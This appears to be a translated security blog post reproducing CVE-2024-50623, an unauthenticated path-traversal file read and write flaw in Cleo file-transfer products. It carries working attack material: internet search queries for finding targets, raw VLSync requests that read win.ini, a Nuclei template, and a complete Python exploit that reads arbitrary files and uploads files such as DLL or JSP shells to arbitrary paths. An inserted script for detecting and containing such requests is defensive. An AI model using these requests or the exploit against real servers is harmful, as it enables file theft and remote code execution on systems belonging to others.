[Vulnerability Reproduction] CVE-2024-50623

混子Hacker  2024-12-22 11:22


Disclaimer

Do not use the techniques in this article for unauthorised testing. Any direct or indirect consequences or losses caused by disseminating or using the information or tools provided here are the sole responsibility of the user; the author accepts no legal or joint liability.


Vulnerability overview

——
Recklessness is closer to courage than cowardice is
——

CVE-2024-50623

Cleo LexiCom, VLTrader and Harmony contain an unrestricted file upload and download vulnerability. The synchronisation endpoint neither validates nor confines the path it is given for upload and download operations, so an unauthenticated attacker can read arbitrary files from the host and write attacker-controlled files to arbitrary locations. Writing a file that the product's own processing logic later loads or executes turns this into remote code execution, and from there into data theft, tampering and further intrusion into the network.

Affected versions

Cleo Harmony < 5.8.0.24
Cleo VLTrader < 5.8.0.24
Cleo LexiCom < 5.8.0.24

Note on the range: the CVE description (and the Nuclei template further down) cites 5.8.0.21 as the first fixed build. That fix was found to be bypassable, and Cleo's advisory now points to 5.8.0.24, so the range here is stated against that build. Treat anything below 5.8.0.24 as vulnerable.

CVSS score

8.8

Exploitation conditions

The original page lists "user authentication" here. That does not match the CVSS vector it cites (PR:N, no privileges required) or the reproduction steps below, where the requests carry no valid session: the /Synchronization endpoint accepts the VLSync header unauthenticated, and the only thing the attacker needs is the product version, which the server itself discloses.

Fix

Released


Vulnerability details

01 Asset discovery

fofa: server="Cleo"
Quake: server:"Cleo"



02 Reproduction

1. Request /Synchronization to obtain the version. The product name and version are returned in the Server response header; the version is needed for the v= field of the VLSync header in the next step.

GET /Synchronization HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

2. Send a VLSync header carrying that version and a Retrieve command to read a file. The path= parameter is used as given, with no check that it stays inside the intended directory, so a traversal sequence such as ..\..\..\windows\win.ini reaches the system drive. The jSessionId cookie below is not a valid session; the request succeeds without one.

GET /Synchronization HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Connection: close
Cookie: jSessionId=703gtgoa1qmk3
VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v=5.6.0.1;a=1337;po=5080;s=True;b=False;pp=1337;path=..\..\..\windows\win.ini
Accept-Encoding: gzip
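The two requests above are enough to understand both the defect and how to spot it in traffic. The following script is an added example, not code from the original article or from Cleo: it parses a VLSync header into its command and key=value fields, applies the containment check the vulnerable endpoint lacked (resolve the requested path under a base directory and refuse anything that escapes it, treating backslashes as separators so Windows-style traversal is caught on any platform), and runs a small triage over constructed raw requests to flag Retrieve/ADD operations that escape the base directory or write executable-type files. The base directory, the list of risky extensions and the sample requests are all placeholders made up for this example.

```python
"""Added example: VLSync header parsing, path containment and request triage
for CVE-2024-50623-style traffic. Not Cleo's code; BASE_DIR, RISKY_WRITE_EXT
and SAMPLE_REQUESTS are constructed for illustration."""
import posixpath
import re

# Placeholder for the directory a Retrieve/ADD should be confined to.
BASE_DIR = "/opt/cleo/sync"
# Hypothetical set of extensions whose creation via ADD deserves an alert;
# not taken from Cleo's configuration.
RISKY_WRITE_EXT = {".jsp", ".dll", ".xml", ".jar", ".class"}


def parse_vlsync(header: str):
    """Split 'Retrieve;l=...;n=...;path=...' into (command, {key: value})."""
    command, _, rest = header.partition(";")
    params = {}
    for field in rest.split(";"):
        key, sep, value = field.partition("=")
        if sep:
            params[key.strip()] = value.strip()
    return command.strip(), params


def contain_path(base: str, requested: str):
    """Return the resolved path if it stays under base, else None.

    This is the check the vulnerable endpoint did not perform: backslashes
    are normalised to '/', absolute paths and drive letters are refused, and
    the joined path must still start with the base after normpath()."""
    rel = requested.replace("\\", "/")
    if rel.startswith("/") or re.match(r"^[A-Za-z]:", rel):
        return None  # absolute path or drive letter
    base_n = posixpath.normpath(base)
    joined = posixpath.normpath(posixpath.join(base_n, rel))
    if joined == base_n or joined.startswith(base_n + "/"):
        return joined
    return None


def classify_request(raw: str):
    """Return (verdict, reason) for one raw HTTP request text."""
    request_line = raw.split("\n", 1)[0]
    if "/Synchronization" not in request_line:
        return "ignore", "not the Synchronization endpoint"
    m = re.search(r"^VLSync:\s*(.+)$", raw, flags=re.MULTILINE | re.IGNORECASE)
    if not m:
        return "benign", "no VLSync header (version probe)"
    command, params = parse_vlsync(m.group(1))
    path = params.get("path", "")
    if command.lower() not in ("retrieve", "add"):
        return "benign", f"unhandled command {command}"
    if contain_path(BASE_DIR, path) is None:
        return "alert", f"{command} escapes base dir: {path}"
    ext = posixpath.splitext(path.replace("\\", "/"))[1].lower()
    if command.lower() == "add" and ext in RISKY_WRITE_EXT:
        return "alert", f"ADD of executable-type file: {path}"
    return "benign", f"{command} within base dir: {path}"


# Constructed sample requests: a version probe, the traversal read from the
# article, a harmless upload, an upload of a .jsp, and unrelated traffic.
SAMPLE_REQUESTS = [
    "GET /Synchronization HTTP/1.1\nHost: target\nConnection: close\n",
    "GET /Synchronization HTTP/1.1\nHost: target\n"
    "VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v=5.8.0.1;a=1337;po=5080;"
    "s=True;b=False;pp=1337;path=..\\..\\..\\windows\\win.ini\n",
    "POST /Synchronization HTTP/1.1\nHost: target\n"
    "VLSync: ADD;l=Ab1234-RQ0258;n=VLTrader;v=5.8.0.1;a=1337;po=1337;"
    "s=True;b=False;pp=1337;path=inbox\\report.txt\n",
    "POST /Synchronization HTTP/1.1\nHost: target\n"
    "VLSync: ADD;n=VLTrader;v=5.8.0.1;path=sub\\x.jsp\n",
    "GET /index.html HTTP/1.1\nHost: target\n",
]


def triage(requests=SAMPLE_REQUESTS):
    """Classify each raw request; returns a list of (verdict, reason)."""
    return [classify_request(r) for r in requests]


if __name__ == "__main__":
    for verdict, reason in triage():
        print(f"{verdict:6} {reason}")
```

Two things worth noting: contain_path() works on the normalised string, not the file system, so it is safe to run over captured traffic from a different OS; and the ".jsp" alert fires even when the path stays inside the base directory, because the write itself, not only traversal, is what turns the file-write primitive into code execution.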


03 Nuclei PoC

id: CVE-2024-50623

info:
  name: Cleo - Arbitrary File Read
  author: DhiyaneshDK
  severity: high
  description: |
    In Cleo Harmony before 5.8.0.21, VLTrader before 5.8.0.21, and LexiCom before 5.8.0.21, there is an unrestricted file upload and download that could lead to remote code execution.
  reference:
    - https://support.cleo.com/hc/en-us/articles/27140294267799-Cleo-Product-Security-Advisory
    - https://github.com/watchtowrlabs/CVE-2024-50623
    - https://labs.watchtowr.com/cleo-cve-2024-50623/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-50623
    cwe-id: CWE-434
    epss-score: 0.00043
    epss-percentile: 0.10702
  metadata:
    max-request: 2
    shodan-query: 'Server: Cleo'
  tags: cve,cve2024,cleo,vltrader,lexicom,harmony,lfi
  
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /Synchronization HTTP/1.1
        Host: {{Hostname}}
        
    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(response), "cleo")'
        internal: true
        
    extractors:
      - type: regex
        name: version
        part: header
        internal: true
        regex:
          - "Server: Cleo.*?/([0-9.]+)"
        group: 1
        
  - raw:
      - |
        GET /Synchronization HTTP/1.1
        Host: {{Hostname}}
        VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v={{version}};a=1337;po=5080;s=True;b=False;pp=1337;path=..\..\..\windows\win.ini
        
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

Python PoC (watchTowr)

banner = """             __         ___  ___________                   
     __  _  ______ _/  |__ ____ |  |_\\__    ____\\____  _  ________ 
     \\ \\/ \\/ \\__  \\    ___/ ___\\|  |  \\|    | /  _ \\ \\/ \\/ \\_  __ \\
      \\     / / __ \\|  | \\  \\___|   Y  |    |(  <_> \\     / |  | \\/
       \\/\\_/ (____  |__|  \\___  |___|__|__  | \\__  / \\/\\_/  |__|   
                  \\/          \\/     \\/                            

        CVE-2024-50623.py
        (*) Cleo Unrestricted file upload and download vulnerability (CVE-2024-50623)

          - Sonny and Sina Kheirkhah (@SinSinology) of watchTowr ([email protected])

        CVEs: [CVE-2024-50623]  """


import sys
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import requests
requests.packages.urllib3.disable_warnings()
import argparse

print(banner)

parser = argparse.ArgumentParser(
    usage="""python CVE-2024-50623 --target http://192.168.1.1/ --action read_or_write --where ..\\..\\pwned.txt --what shell.dll_jsp_xml_txt_zip""",
    description="Cleo Unrestricted file upload and download vulnerability (CVE-2024-50623)")

parser.add_argument("--target", help="Target URL", required=True)
parser.add_argument("--action", help="Action to perform", choices=['write', 'read'], required=True)
parser.add_argument("--where", help="File to write or read", required=True)
parser.add_argument("--what", help="local file to upload", required=False)

args = parser.parse_args()
args.target = args.target.rstrip('/')

s = requests.Session()
s.verify = False  # self-signed certificates are common on these hosts


def extract_version(target):
    # The Server header on /Synchronization discloses "<product>/<version>";
    # the version is echoed back in the v= field of VLSync below.
    r = s.get(f"{target}/Synchronization")
    version = r.headers['Server'].split('/')[1].split(' ')[0]
    return version


def read_file(target, where, target_version):
    # Retrieve: the server opens path= as given (no traversal check) and
    # returns the file contents in the response body.
    headers = {
        'VLSync': f"Retrieve;l=Ab1234-RQ0258;n=VLTrader;v={target_version};a=1337;po=1337;s=True;b=False;pp=1337;path={where}"
    }
    r = s.get(f"{target}/Synchronization", headers=headers)
    if r.status_code == 200:
        print(r.text)
    else:
        print("[ERROR] Failed to read the file")


def write_file(target, where, what, target_version):
    # ADD: the POST body is written to path=, again without confinement.
    headers = {
        'VLSync': f"ADD;l=Ab1234-RQ0258;n=VLTrader;v={target_version};a=1337;po=1337;s=True;b=False;pp=1337;path={where}"
    }
    r = s.post(f"{target}/Synchronization", headers=headers, data=what)
    if r.status_code == 200:
        print("[INFO] File written successfully")
    else:
        print("[ERROR] Failed to write the file")


if args.action == 'read':
    read_file(args.target, args.where, extract_version(args.target))
elif args.action == 'write':
    if args.what is None:
        print("[ERROR] --what is required for write action")
        sys.exit(1)
    with open(args.what, "rb") as fh:
        payload = fh.read()
    write_file(args.target, args.where, payload, extract_version(args.target))
else:
    print("[ERROR] Invalid action")
    sys.exit(1)

Original article | Please link to the source when reposting

More vulnerabilities | Follow the author

Author | 混子Hacker